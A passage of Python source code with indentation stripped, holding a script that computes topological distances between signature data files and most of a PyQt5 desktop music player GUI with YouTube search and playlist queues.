original_data, interpolated_data, files_to_ignore = [], [], []
for dirpath, dirnames, filenames in os.walk(orig_path):
for filename in filenames:
files_to_ignore.append(os.path.join(dirpath, filename))
break
for dirpath, dirnames, filenames in os.walk(orig_path):
for filename in filenames:
original_data.append(os.path.join(dirpath, filename))
for dirpath, dirnames, filenames in os.walk(interpol_path):
for filename in filenames:
interpolated_data.append(os.path.join(dirpath, filename))
original_data = diff(original_data, files_to_ignore)
interpolated_data = diff(interpolated_data, files_to_ignore)
for i in original_data:
matching = [s for s in interpolated_data if i[20:] in s]
matching.sort()
for j in matching:
distance = sim_homology.persistence_distance(i, j, filtration=filtration, type=type)
with open("results/" + filtration + "_" + type + ".csv", "a") as fd:
fd.write(
i[20 : len(i) - 4]
+ ","
+ j[32 : len(j) - 4]
+ ","
+ str(distance)
+ "\n"
)
print(
"File with name "
+ j
+ " has been compared to "
+ i
+ ". The " + type + "distance is "
+ str(distance)
+ "."
)
def run_in_parallel(*fns):
"""
Runs several functions in parallel.
:param fns: Several functions.
    :return: None; prints a message once all processes have finished.
"""
proc = []
for fn in fns:
p = Process(target=fn)
p.start()
proc.append(p)
for p in proc:
p.join()
return print("Processing finished!")
########################################################################################################################
""" RUN THE DISTANCES
from functools import partial
# Pass callables (not calls) so the work actually happens in the child processes:
run_in_parallel(
    partial(create_distance_file, "data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="rips", type="wasserstein"),
    partial(create_distance_file, "data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="alpha", type="wasserstein"),
    partial(create_distance_file, "data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="witness", type="wasserstein"),
    partial(create_distance_file, "data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="rips", type="bottleneck"),
    partial(create_distance_file, "data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="alpha", type="bottleneck"),
    partial(create_distance_file, "data/MOBISIG/", "data/MOBISIG_natneighbor/", filtration="witness", type="bottleneck")
)
"""
########################################################################################################################
|
gui.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import threading
from collections import deque
from math import ceil
from random import shuffle
import qdarkstyle
import requests
from PyQt5 import QtCore, QtGui
from PyQt5.QtCore import QSize, pyqtSignal, QRectF, Qt, QPoint, QTimer
from PyQt5.QtGui import QIcon, QPixmap, QPainter, QImage, QColor, QPen, QBrush
from PyQt5.QtWidgets import (QWidget, QLabel, QPushButton, QApplication,
QSizePolicy, QHBoxLayout, QSlider, QGridLayout,
QGraphicsDropShadowEffect, QGraphicsPixmapItem,
QGraphicsScene, QListWidget, QListWidgetItem, QStyledItemDelegate,
QMenu, QDialog, QLineEdit, QVBoxLayout, QFrame, QMessageBox,
QMainWindow, QProxyStyle, QStyle, QDockWidget,
QStackedWidget)
from src.settings import SettingsManager
from src._database import DBHandler, DBSong, attribute_names
from src.downloader import DownloaderPool
from src.globals import GV
from src.gui.table_view import SQLAlchemyTableModel, Column, SongTable
from src.keybinds import KeyBinds, KeyBind, KeyCodes
from src.metadata import MetadataUpdater
from src.player import GUIPlayer
from src.session import SessionManager
from src.song import Song
from src.utils import parse_duration, at_exit, run_on_exit, run_funcs_on_exit
class Icons:
IconDir = os.path.join(os.getcwd(), 'icons')
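    # QPixmap/QIcon instances need a running QApplication, so these stay None
    # placeholders until create_icons() is called after the application is constructed (see __main__).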
if 'app' in locals():
FullStar = QPixmap(os.path.join(IconDir, 'star_white.png'))
HalfStar = QPixmap(os.path.join(IconDir, 'star_half_white.png'))
EmptyStar = QPixmap(os.path.join(IconDir, 'star_border.png'))
Menu = QIcon(os.path.join(IconDir, 'menu.png'))
else:
FullStar = None
HalfStar = None
EmptyStar = None
Menu = None
@classmethod
def create_icons(cls):
Icons.FullStar = QPixmap(os.path.join(Icons.IconDir, 'star_white.png'))
Icons.HalfStar = QPixmap(os.path.join(Icons.IconDir, 'star_half_white.png'))
Icons.EmptyStar = QPixmap(os.path.join(Icons.IconDir, 'star_border.png'))
Icons.Menu = QIcon(os.path.join(Icons.IconDir, 'menu.png'))
class DurationSlider(QSlider):
def __init__(self, on_pos_change):
super().__init__()
self.setSingleStep(0)
self.setPageStep(0)
self.dragging = False
self.on_change = on_pos_change
def mousePressEvent(self, event):
super().mousePressEvent(event)
if event.button() == 1:
self.setSliderPosition(int(event.x() / self.width() * self.maximum()))
def mouseMoveEvent(self, event):
if int(event.buttons()) == 1:
self.dragging = True
self.setSliderPosition(int(event.x() / self.width() * self.maximum()))
def mouseReleaseEvent(self, event):
super().mouseReleaseEvent(event)
if event.button() == 1:
self.dragging = False
self.on_change(self)
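# Renders a pixmap through a temporary QGraphicsScene so that a QGraphicsEffect
# (e.g. the drop-shadow glow below) can be baked into a QImage.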
def apply_effect_to_pixmap(src: QPixmap, effect, extent=0, size: QSize=None):
if src.isNull():
return src
scene = QGraphicsScene()
item = QGraphicsPixmapItem()
item.setPixmap(src)
item.setGraphicsEffect(effect)
scene.addItem(item)
size = src.size() if size is None else size
res = QImage(size + QSize(extent * 2, extent * 2), QImage.Format_ARGB32)
res.fill(Qt.transparent)
ptr = QPainter(res)
scene.render(ptr, QRectF(), QRectF(-extent, -extent, size.width() + extent * 2, size.height() + extent*2))
return res
class MediaButton(QPushButton):
hovered = pyqtSignal('QEnterEvent')
left = pyqtSignal('QEvent')
mouse_hovered = False
def __init__(self, icon, on_click, size, *args):
super().__init__(*args)
self.setIconSize(QSize(*[int(x * 0.85) for x in size]))
self.set_icon(icon)
self.setStyleSheet(self.stylesheet())
self.setMask(QtGui.QRegion(QtCore.QRect(0, 0, *[int(x*0.95) for x in size]), QtGui.QRegion.Ellipse))
self.setFixedSize(*size)
self.src = icon
self.mouse_hovered = False
self.on_click = lambda x: on_click(self)
self.clicked.connect(self.on_click)
self.setMouseTracking(True)
self.hovered.connect(lambda x: self.mouse_hover(x))
self.left.connect(lambda x: self.mouse_leave(x))
def enterEvent(self, event):
self.hovered.emit(event)
def leaveEvent(self, event):
self.left.emit(event)
def mouse_hover(self, event):
self.mouse_hovered = True
self.set_icon(self.icon(), True)
def mouse_leave(self, event):
self.mouse_hovered = False
self.set_icon(self.icon(), False)
@staticmethod
def set_glow(src):
effect = QGraphicsDropShadowEffect()
effect.setBlurRadius(50)
effect.setOffset(0, 0)
effect.setEnabled(True)
effect.setColor(QColor('#0000CC'))
image = apply_effect_to_pixmap(QPixmap(src), effect)
icon = QIcon(QPixmap().fromImage(image))
return icon
def set_icon(self, icon, effect=None):
if effect is None:
effect = self.mouse_hovered
if isinstance(icon, str):
self.src = icon
icon = self.set_glow(icon) if effect else QIcon(icon)
else:
icon = self.set_glow(self.src) if effect else QIcon(self.src)
self.setIcon(icon)
self.setIconSize(self.iconSize())
self.update()
@staticmethod
def stylesheet():
return """
QPushButton:pressed {
background: transparent;
border: none;
}
QPushButton {
background: transparent;
border: none;
}
QPushButton:disabled {
background: transparent;
}"""
class MediaControls(QHBoxLayout):
def __init__(self, player_):
super().__init__()
self.player = player_
self.player.duration_fn = self.update_duration
self.player.on_start = self.player_start
self.seek_lock = threading.Lock()
self.playing = False
self.current = None
size_policy = QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
size = (35, 35)
play = MediaButton('icons/play_white.png', self.play_pause, size)
self.play = play
next_button = MediaButton('icons/next_white.png', self.next, size)
previous = MediaButton('icons/previous_white.png', self.previous, size)
play.setSizePolicy(size_policy)
next_button.setSizePolicy(size_policy)
previous.setSizePolicy(size_policy)
self.addWidget(previous)
self.addWidget(play)
self.addWidget(next_button)
mid_layout = QGridLayout()
self.title = QLabel()
self.title.setStyleSheet('QLabel { font-weight: bold; }')
self.rating = RatingBar(on_change=self.change_rating)
slider = DurationSlider(self.seek)
slider.setMinimumHeight(20)
slider.setMinimumWidth(100)
slider.setMaximum(2000)
slider.setBaseSize(QtCore.QSize(800, 20))
slider.setSizePolicy(QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Fixed))
slider.setOrientation(QtCore.Qt.Horizontal)
slider.setStyleSheet(self.stylesheet)
dur = QLabel()
self.total_dur = '00:00/00:00'
dur.setText(self.total_dur)
dur.setBaseSize(QtCore.QSize(70, 30))
dur.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
mid_layout.addWidget(self.title, 0, 0, Qt.AlignLeft)
mid_layout.addWidget(self.rating, 0, 1, Qt.AlignRight)
mid_layout.addWidget(dur, 0, 2, Qt.AlignRight)
mid_layout.addWidget(slider, 1, 0, 1, 3)
w = QWidget()
w.setLayout(mid_layout)
self.addWidget(w)
self.slider = slider
self.dur = dur
def play_pause(self, button):
self.playing = self.player.pause()
self.player.unpaused.set()
self.set_play_icon(button)
def set_play_icon(self, button):
if self.playing is None or self.playing is False:
button.set_icon('icons/play_white.png')
self.playing = False
else:
self.playing = True
button.set_icon('icons/pause_white.png', False)
def change_rating(self, score):
if self.current is not None:
self.current.rating = score
def next(self, button):
self.player.play_next_song()
self.playing = False
self.set_play_icon(self.play)
def previous(self, button):
if self.player.current is None:
index = self.player.index - 1
else:
index = self.player.current.index - 1
self.player.skip_to(index)
self.playing = False
self.set_play_icon(self.play)
def song_changed(self, song):
self.current = song
self.total_dur = song.duration_formatted
self.dur.setText('00:00/{}'.format(self.total_dur))
name, author = song.get_name_and_author()
self.title.setText('{} - {}'.format(author, name))
self.rating.set_value(song.rating)
def player_start(self, player_):
self.playing = True
self.set_play_icon(self.play)
def update_duration(self, stream_player):
iteration = stream_player.duration
total = self.player.current.duration
if total is None:
total = 1
self.dur.setText(parse_duration(iteration) + '/' + self.total_dur)
if not self.slider.dragging:
self.slider.setSliderPosition(int(self.slider.maximum()*(iteration/total)))
def seek(self, slider):
if self.player.not_playing.is_set():
return
if self.seek_lock.acquire(False):
t = threading.Thread(target=self._seek, args=(slider, self.seek_lock,))
t.start()
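    # Runs in a worker thread started by seek(); dragging the slider all the way to the end
    # skips to the next song, otherwise the stream is seeked proportionally to the slider position.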
def _seek(self, slider, lock):
try:
if slider.value() == slider.maximum():
self.player.play_next_song()
return
total = self.player.current.duration
seconds = slider.value()/slider.maximum()*total
self.player.stream_player.seek(seconds, self.player.current.ffmpeg)
finally:
lock.release()
class CoverArt(QLabel):
def __init__(self, default_image='download.png'):
super().__init__()
self.pixmap = QtGui.QPixmap(default_image)
self.default_image = default_image
def paintEvent(self, event):
size = self.size()
painter = QPainter(self)
point = QPoint(0, 0)
scaledPix = self.pixmap.scaled(size, QtCore.Qt.KeepAspectRatio,
QtCore.Qt.SmoothTransformation)
        point.setX(int((size.width() - scaledPix.width()) / 2))
        point.setY(int((size.height() - scaledPix.height()) / 2))
painter.drawPixmap(point, scaledPix)
def change_pixmap(self, img, update=True):
if img is None:
img = self.default_image
self.pixmap = QPixmap(img)
if update:
self.update()
def change_pixmap_from_data(self, data, update=True):
self.pixmap = QPixmap()
self.pixmap.loadFromData(data)
if update:
self.update()
def heightForWidth(self, width):
return width
class PlaylistDialog(QDialog):
def __init__(self, after_info, *args, extract_flat=True):
super().__init__(*args)
self.setMinimumSize(200, 25)
self.text_edit = QLineEdit(self)
self.after_info = after_info
self.text_edit.returnPressed.connect(self.get_playlist)
self.ready = True
self.extract_flat = extract_flat
def get_playlist(self, *args):
if self.ready is False:
return
self.ready = False
text = self.text_edit.text()
if text is None or len(text) < 2:
return
dl = session.downloader
future = dl.get_info(text, flat=self.extract_flat)
future.add_done_callback(self.after_info)
session.temp_futures.append(future)
class ADialog(QDialog):
def __init__(self, after_info, *args, extract_flat=True):
super().__init__(*args)
self.setMinimumSize(200, 25)
self.text_edit = QLineEdit(self)
self.after_info = after_info
self.text_edit.returnPressed.connect(self.get_playlist)
self.ready = True
self.extract_flat = extract_flat
def get_playlist(self, *args):
if self.ready is False:
return
self.ready = False
text = self.text_edit.text()
dl = session.downloader
future = dl.get_info(text, flat=self.extract_flat)
future.add_done_callback(self.after_info)
session.temp_futures.append(future)
class SearchDialog(QDialog):
def __init__(self, *args):
super().__init__(*args)
self.setMinimumSize(200, 385)
self.list = SearchListWidget()
self.list.setIconSize(QSize(75, 75))
size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Preferred)
size_policy.setHorizontalStretch(3)
self.list.setSizePolicy(size_policy)
self.text_edit = QLineEdit()
self.text_edit.returnPressed.connect(self.on_enter)
self.text_edit.setBaseSize(150, 25)
self.text_edit.setMaximumHeight(25)
size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Preferred)
self.text_edit.setSizePolicy(size_policy)
self.box = QVBoxLayout(self)
self.box.addWidget(self.text_edit)
self.box.addWidget(self.list)
self.list.setItemDelegate(SongItemDelegate(True, parent=self))
self.list.setUniformItemSizes(True)
self.list.setMinimumSize(150, 250)
self.downloader = DownloaderPool()
def on_enter(self, *args):
text = self.text_edit.text()
if text is None or len(text) == 0:
return
search = 'ytsearch5:%s' % text
future = self.downloader.get_info(search)
future.add_done_callback(self.on_ready)
def on_ready(self, future):
info = future.result()
if info is None:
return
self.list.hovered = None
self.list.clear()
for entry in info['entries']:
self.list.addItem(SearchItem(entry))
class SearchItem(QListWidgetItem):
def __init__(self, info, *args):
super().__init__(*args)
self.setSizeHint(QSize(150, 75))
self.info = info
self.setText('{}\r\n{}'.format(info.get('title', 'Untitled'), info.get('uploader', 'Unknown')))
self.setData(Qt.UserRole, parse_duration(info.get('duration', 0)))
self.setBackground(QBrush(QColor(167, 218, 245, 0)))
if 'thumbnail' in info:
url = info.get('thumbnail')
r = requests.get(url, stream=True)
pixmap = QPixmap()
pixmap.loadFromData(r.content)
self.setIcon(QIcon(pixmap.scaled(QSize(80, 80), Qt.KeepAspectRatio,
Qt.SmoothTransformation)))
class BaseListWidget(QListWidget):
unchecked_color = QBrush(QColor(0, 0, 0, 0))
checked_color = QBrush(QColor('#304FFE'))
hover_color = QBrush(QColor(48, 79, 254, 150))
def __init__(self, *args):
super().__init__(*args)
self.hovered = None
self.currently_selected = None
self.setMouseTracking(True)
self.setUniformItemSizes(True)
def _change_hovered_from_event(self, event):
item = self.itemAt(event.pos())
if item == self.hovered:
return
self.change_hovered(item)
def change_hovered(self, item):
def set_hovered(_item):
self.hovered = _item
if _item.checkState() == Qt.Checked:
return
_item.setBackground(self.hover_color)
if item is None:
if self.hovered is None:
return
color = self.checked_color if self.hovered.checkState() == Qt.Checked else self.unchecked_color
self.hovered.setBackground(color)
self.hovered = None
return
if self.hovered is None:
set_hovered(item)
else:
color = self.checked_color if self.hovered.checkState() == Qt.Checked else self.unchecked_color
self.hovered.setBackground(color)
set_hovered(item)
def wheelEvent(self, event):
super().wheelEvent(event)
self._change_hovered_from_event(event)
def mouseMoveEvent(self, event):
self._change_hovered_from_event(event)
def change_selected(self, item):
if self.currently_selected is not None:
self.currently_selected.setBackground(self.unchecked_color)
self.currently_selected.setCheckState(Qt.Unchecked)
self.currently_selected = item
if item is not None:
item.setCheckState(Qt.Checked)
item.setBackground(self.checked_color)
def on_item_clicked(self, item):
if item is not None:
if item.checkState() == Qt.Unchecked:
self.change_selected(item)
else:
if self.currently_selected is item:
return
item.setCheckState(Qt.Unchecked)
item.setBackground(self.unchecked_color)
if self.currently_selected is not None:
self.currently_selected.setCheckState(Qt.Unchecked)
self.currently_selected = None
class SearchListWidget(BaseListWidget):
def __init__(self, *args):
super().__init__(*args)
self.itemClicked.connect(self.on_item_clicked)
self.itemDoubleClicked.connect(self.on_doubleclick)
@staticmethod
def on_doubleclick(item):
player.play_from_search(item.info)
class SongList(BaseListWidget):
items_updated = pyqtSignal(int)
def __init__(self, player_, session_, settings_manager_, icons, cover_art):
super().__init__()
self.last_doubleclicked = None
self.player = player_
self.settings_manager = settings_manager_
self.icons = icons
self.cover_art = cover_art
self.setItemDelegate(SongItemDelegate(parent=self, paint_icons=self.settings.value('paint_icons', True)))
self.itemClicked.connect(self.on_item_clicked)
self.itemDoubleClicked.connect(self.on_doubleclick)
self.session = session_
self.items = {GV.MainQueue: [], GV.SecondaryQueue: [], GV.MarkedQueue: []}
self.items_updated.connect(self.list_updated)
        # initial population is driven by QueueWidget via load_current_queue()
self.timer = QTimer()
self.icon_timer = QTimer()
self.icon_timer.setSingleShot(True)
self.icon_timer.timeout.connect(self.load_current_index)
self.item_pages = deque()
self.item_page = 0
self.page_length = 20
self.loaded_pages = deque()
self.current_queue = self.settings.value('queue', GV.MainQueue)
self.verticalScrollBar().valueChanged.connect(self.on_scroll)
self.timer.setSingleShot(True)
self.timer.timeout.connect(self.change_song)
@property
def settings(self):
return self.settings_manager.get_settings_instance()
def list_updated(self, queue_id):
if queue_id != self.current_queue:
return
self.load_current_queue()
@property
def current_items(self):
return self.items[self.current_queue]
def item_list(self, list_type=list):
q = list_type()
for i in range(self.count()):
q.append(self.item(i))
return q
def scroll_to_selected(self):
current = self.player.current
if current is not None:
self.scrollToItem(current)
self.load_items_by_index(current.song.index)
def shuffle_queue(self):
items = self.item_list()
shuffle(items)
self.clear_items()
queue = self.session.queues[self.current_queue]
queue.clear()
for idx, item in enumerate(items):
item.song.index = idx
self.add_from_item(item)
queue.append(item.song)
def load_last_queue(self):
self.change_selected(None)
if self.current_queue == GV.MainQueue:
self.current_queue = GV.SecondaryQueue
index = self.session.secondary_index
self.session.main_index = self.session.index
else:
self.current_queue = GV.MainQueue
index = self.session.main_index
self.session.secondary_index = self.session.index
self.session.index = index
self.settings.setValue('queue', self.current_queue)
self.load_current_queue()
self.player.skip_to(index, self.item(index))
self.load_items_by_index(index)
self.scrollToItem(self.item(index))
def load_current_queue(self):
self.clear_items()
q = self.session.queues[self.current_queue]
for song in q:
item = self.add_list_item(song)
self.add_to_item_page(item)
self.load_current_index()
self.player.update_queue(self.current_queue)
def clear_items(self):
self.currently_selected = None
self.current_items.clear()
self.reset_item_page()
while self.count() > 0:
self.takeItem(0)
def load_current_index(self):
self.load_items_by_index(self.verticalScrollBar().value())
def on_scroll(self, value):
self.icon_timer.stop()
self.icon_timer.start(250)
def contextMenuEvent(self, event):
item = self.itemAt(event.pos())
trim_action = None
cover_art_action = None
search = None
menu = QMenu(self)
if item is not None:
trim_action = menu.addAction('Trim cover art borders')
cover_art_action = menu.addAction('Update cover art')
search = menu.addAction('Search')
playlist = menu.addAction('Play playlist')
switch_action = menu.addAction('switch q')
vid_q = menu.addAction('Add to secondary queue')
shuffle_action = menu.addAction('Shuffle queue')
clear_action = menu.addAction('Clear this queue')
action = menu.exec_(self.mapToGlobal(event.pos()))
if action == trim_action:
try:
item.song.trim_cover_art()
main_window.update()
except Exception as e:
print('exception while trimming. %s' % e)
elif action == cover_art_action:
item.song.set_cover_art(forced=True)
elif action == search:
dialog = SearchDialog(self.parent())
dialog.exec_()
elif action == playlist:
dia = PlaylistDialog(self._playlist_from_future, self.parent())
dia.exec_()
elif action == switch_action:
self.load_last_queue()
elif action == vid_q:
d = ADialog(self.append_to_queue_future, self.parent(), extract_flat=False)
d.exec_()
elif action == shuffle_action:
self.shuffle_queue()
elif action == clear_action:
message_box = QMessageBox()
message_box.setIcon(QMessageBox.Warning)
message_box.setWindowTitle('Confirm list clearing')
message_box.setInformativeText('Are you sure you want to clear this list')
message_box.addButton('Cancel', QMessageBox.RejectRole)
            yes_button = message_box.addButton('Yes', QMessageBox.AcceptRole)
            message_box.exec_()
            if message_box.clickedButton() is yes_button:
                self.clear_current_queue()
def clear_current_queue(self):
self.clear_items()
current = self.current_queue
queue = self.session.queues.get(current, [])
queue.clear()
def _add_from_info(self, info, link_getter=None):
songs = []
q = self.session.queues[GV.SecondaryQueue]
l = len(q)
session = db.get_thread_local_session()
for idx, entry in enumerate(info['entries']):
if callable(link_getter):
link = link_getter(entry)
else:
link = entry.get('webpage_url')
song = db.get_temp_song(entry.get('title', 'Untitled'),
link, item_type='link',
session=session, commit=False)
session.expunge(song)
item = Song(song, db, self.session.downloader, index=idx + l)
self.session.add_to_queue(item, queue=GV.SecondaryQueue)
songs.append(item)
session.commit()
session.close()
db.Session.remove()
if self.current_queue == GV.SecondaryQueue:
self.load_songs(songs)
self.load_items_by_page(self.item_page)
print('done')
metadata_updater.add_to_update(songs)
def append_to_queue_future(self, future):
info = future.result()
if info is None:
return
if 'entries' not in info:
return
self._add_from_info(info)
def _playlist_from_future(self, future):
info = future.result()
if info is None:
return
if info['extractor_key'].lower() != 'youtubeplaylist':
return
if 'entries' not in info:
return
def link(entry):
return 'https://www.youtube.com/watch?v=%s' % entry.get('id')
self._add_from_info(info, link)
def load_songs(self, queue):
_queue = []
for item in queue:
_queue.append(self.add_list_item(item))
return _queue
def leaveEvent(self, event):
self.change_hovered(None)
def addItem(self, item, *args):
super().addItem(item, *args)
self.current_items.append(item)
if self.currently_selected is None:
self.currently_selected = item
item.setBackground(self.checked_color)
item.setCheckState(Qt.Checked)
def change_song(self):
if self.last_doubleclicked is not None:
settings = self.settings
index = self.indexFromItem(self.last_doubleclicked).row()
self.player.skip_to(index, self.last_doubleclicked)
self.session.index = index
settings.setValue('index', index)
if self.current_queue == GV.MainQueue:
self.session.main_index = index
settings.setValue('main_index', index)
elif self.current_queue == GV.SecondaryQueue:
self.session.secondary_index = index
settings.setValue('secondary_index', index)
def on_doubleclick(self, item):
if item is not None:
self.timer.stop()
self.last_doubleclicked = item
self.timer.start(200)
def reset_item_page(self):
self.item_page = 0
self.unload_pages()
self.item_pages.clear()
self.load_current_index()
def get_item_page(self):
if len(self.item_pages) == 0:
self.item_page = 0
self.item_pages.append([])
return self.item_pages[self.item_page]
else:
return self.item_pages[self.item_page]
def add_item_page(self):
page = []
self.item_pages.append(page)
return page
def add_to_item_page(self, item):
page = self.get_item_page()
if len(page) >= self.page_length:
page = self.add_item_page()
self.item_page += 1
page.append(item)
def load_items_by_page(self, page_index):
try:
page = self.item_pages[page_index]
except IndexError:
return
self.loaded_pages.append((page, page_index))
for item in page:
item.update_info()
item.load_icon()
@staticmethod
def unload_page(page):
for item in page:
item.unload_icon()
def unload_pages(self, index_whitelist=None):
if index_whitelist is None:
index_whitelist = []
indexes = []
for idx, p_i in enumerate(self.loaded_pages):
page, index = p_i
if index in index_whitelist:
continue
indexes.append(idx)
self.unload_page(page)
indexes.reverse()
for idx in indexes:
del self.loaded_pages[idx]
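    # Lazily loads icons and text for the page containing `index` plus its neighbouring pages,
    # and unloads every other page to keep memory use down.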
def load_items_by_index(self, index):
page = int(index/self.page_length)
down = page - 1
up = page + 1
try:
self.load_items_by_page(page)
if len(self.item_pages) > up:
self.load_items_by_page(up)
if down >= 0:
self.load_items_by_page(down)
except Exception as e:
print(e)
try:
self.unload_pages([page, up, down])
except Exception as e:
print(e)
def _add_item(self, item, is_selected=False):
song = item.song
name, author = song.get_name_and_author()
item.setText('{}\r\n{}'.format(name, author))
item.setData(Qt.UserRole, song.duration_formatted)
if is_selected:
item.setCheckState(Qt.Checked)
item.setBackground(self.checked_color)
self.change_selected(item)
song.index = self.count()
self.addItem(item)
self.add_to_item_page(item)
return item
def add_from_item(self, item, is_selected=False):
return self._add_item(item, is_selected)
def add_list_item(self, song, is_selected=False):
item = SongItem(song)
return self._add_item(item, is_selected)
class SongItem(QListWidgetItem):
def __init__(self, song, icon_displayed=False, *args):
super().__init__(*args)
self.setFlags(self.flags() | Qt.ItemIsUserCheckable)
self.setCheckState(Qt.Unchecked)
self.setBackground(QBrush(QColor(167, 218, 245, 0)))
self.setSizeHint(QSize(150, 75))
self.song = song
self.img = None
self.icon_displayed = icon_displayed
self.song.on_cover_art_changed = self.update_icon
self.song.after_download = self.update_info
self.loaded = False
def unload_icon(self):
self.setIcon(QIcon())
self.del_from_icons()
self.img = None
self.loaded = False
def del_from_icons(self):
icons = getattr(session, 'icons', {})
if self.img in icons:
uses = icons[self.img][1]
if uses <= 1:
del icons[self.img]
else:
icons[self.img] = (icons[self.img][0], uses - 1)
def load_icon(self):
self._load_icon()
self.loaded = True
def _load_icon(self):
img = self.song.cover_art
if img is None or self.img == img:
return
self.img = img
icons = getattr(session, 'icons', {})
if img in icons:
icon, uses = icons[img]
icons[img] = (icon, uses + 1)
else:
pixmap = QPixmap(img)
icon = QIcon(pixmap.scaled(QSize(75, 75), Qt.KeepAspectRatio, Qt.SmoothTransformation))
icons[img] = (icon, 1)
self.del_from_icons()
self.setIcon(icon)
def update_icon(self, song=None):
if not self.loaded:
return
self.load_icon()
def unload_info(self):
self.setText('')
self.setData(Qt.UserRole, None)
def update_info(self, song=None):
self.setText('{}\r\n{}'.format(*self.song.get_name_and_author()))
self.setData(Qt.UserRole, self.song.duration_formatted)
self.update_icon()
class SongItemDelegate(QStyledItemDelegate):
def __init__(self, paint_icons=True, padding=5, parent=0):
super().__init__(parent)
self.padding = padding
self.paint_icons = paint_icons
@staticmethod
def _check_width(fontmetrics, s, max_width):
text_width = fontmetrics.width(s)
average = fontmetrics.averageCharWidth()
characters = int(max_width / average)
offset = 0
while text_width > max_width:
if offset > 3:
break
s = s[:characters - offset]
text_len = len(s)
if text_len > 3:
s = s[:-3] + '...'
text_width = fontmetrics.width(s)
offset += 1
return s
def paint(self, painter, option, index):
painter.setPen(QPen(Qt.NoPen))
bg_brush = index.data(Qt.BackgroundRole)
painter.setBrush(bg_brush)
painter.drawRect(option.rect)
width = min(option.rect.width(), painter.device().width())
height = option.rect.height()
x = option.rect.x()
y = option.rect.y()
title, author = index.data().split('\r\n', maxsplit=1)
pixmap_width = 0
if self.paint_icons:
icon = index.data(Qt.DecorationRole)
if icon is not None:
painter.setPen(QPen(Qt.NoPen))
pixmap = icon.pixmap(QSize(height, height))
                pixmap_y = y + (height - pixmap.height()) // 2
painter.drawPixmap(QPoint(x, pixmap_y), pixmap)
pixmap_width = pixmap.width()
used_width = x + pixmap_width + self.padding
duration = str(index.data(Qt.UserRole))
dur_width = painter.fontMetrics().width(duration) + self.padding*3
usable_width = width - pixmap_width - dur_width
title = self._check_width(painter.fontMetrics(), title, usable_width)
author = self._check_width(painter.fontMetrics(), author, usable_width)
font_height = painter.fontMetrics().height()
painter.setPen(QPen(Qt.white))
painter.drawText(QRectF(used_width, y, usable_width, height), Qt.AlignLeft, title)
painter.setPen(QPen(Qt.gray))
painter.drawText(QRectF(used_width, y + font_height + self.padding, usable_width - self.padding, height - self.padding - font_height),
Qt.AlignLeft, author)
painter.drawText(QRectF(width - dur_width, y, dur_width - self.padding, height),
Qt.AlignRight, duration)
class RatingBar(QWidget):
def __init__(self, *args, on_change=None):
super().__init__(*args)
size_policy = QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.setSizePolicy(size_policy)
self.setMouseTracking(True)
self._value = 0
self.maximum = 10
self.padding = 1
self.setFixedWidth((20 + self.padding)*5)
self.setFixedHeight(20)
self.on_change = on_change
self.full_star = Icons.FullStar
self.half_star = Icons.HalfStar
self.empty_star = Icons.EmptyStar
self.scale_stars()
def scale_stars(self):
star_width = int((self.width() - self.padding*5)/5)
self.full_star = Icons.FullStar.scaledToWidth(star_width, Qt.SmoothTransformation)
self.half_star = Icons.HalfStar.scaledToWidth(star_width, Qt.SmoothTransformation)
self.empty_star = Icons.EmptyStar.scaledToWidth(star_width, Qt.SmoothTransformation)
@property
def value(self):
return self._value
def set_value(self, value, update=True):
if isinstance(value, int):
self._value = value
if update:
self.update()
def mouseMoveEvent(self, event):
super().mouseMoveEvent(event)
if event.buttons() == Qt.LeftButton:
self.set_value(int(ceil(event.x() / self.width() * self.maximum)))
def mousePressEvent(self, event):
if event.button() == 1:
self.set_value(int(ceil(event.x() / self.width() * self.maximum)))
def mouseReleaseEvent(self, event):
if event.button() == 1 and callable(self.on_change):
self.on_change(self.value)
def paintEvent(self, event):
rect = event.rect()
x = rect.x()
y = rect.y()
star_width = int((self.width() - self.padding*5)/5)
pos = 0
painter = QPainter(self)
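        # ratings use a 0-10 scale: every two points is a full star, an odd remainder adds a half star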
full_stars, half_stars = divmod(self.value, 2)
empty_stars = int((self.maximum - self.value)/2)
def draw_pixmap(pixmap):
nonlocal pos
target = QtCore.QPointF(x + pos, y)
painter.drawPixmap(target, pixmap)
pos += star_width + self.padding
while full_stars > 0:
draw_pixmap(self.full_star)
full_stars -= 1
while half_stars > 0:
draw_pixmap(self.half_star)
half_stars -= 1
while empty_stars > 0:
draw_pixmap(self.empty_star)
empty_stars -= 1
class SongInfoBox(QFrame):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.setLineWidth(0)
self.setMidLineWidth(1)
        self.setFrameStyle(QFrame.Box | QFrame.Plain)
self.setMinimumHeight(10)
self.setMaximumHeight(150)
size_policy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Minimum)
self.setSizePolicy(size_policy)
layout = QGridLayout()
layout.setSpacing(3)
self.title = QLabel()
self.title.setWordWrap(True)
self.title.setAlignment(Qt.AlignTop | Qt.AlignLeft)
self.artist = QLabel()
self.artist.setWordWrap(True)
self.artist.setAlignment(Qt.AlignBottom | Qt.AlignLeft)
self.duration = QLabel()
self.duration.setAlignment(Qt.AlignBottom | Qt.AlignRight)
layout.addWidget(self.title, 0, 0, 1, 2)
layout.addWidget(self.artist, 1, 0, 1, 2)
layout.addWidget(self.duration, 1, 2, 1, 1)
self.setLayout(layout)
def update_info(self, song):
title, author = song.get_name_and_author()
self.title.setText(title)
self.artist.setText(author)
self.duration.setText(song.duration_formatted)
class QueueWidget(QWidget):
song_changed = pyqtSignal(object, bool, int, bool, bool)
def __init__(self, settings_manager_, db_, player_, keybinds_, session_, media_controls, *args):
super().__init__(*args)
self.db = db_
self.player = player_
self.player.on_next = self.song_changed
self.kb = keybinds_
self.session = session_
self.settings_manager = settings_manager_
logger.debug('Creating widgets')
self.media_controls = media_controls
self.media_controls.set_rating = self.change_rating
logger.debug('Media controls created')
layout = QGridLayout()
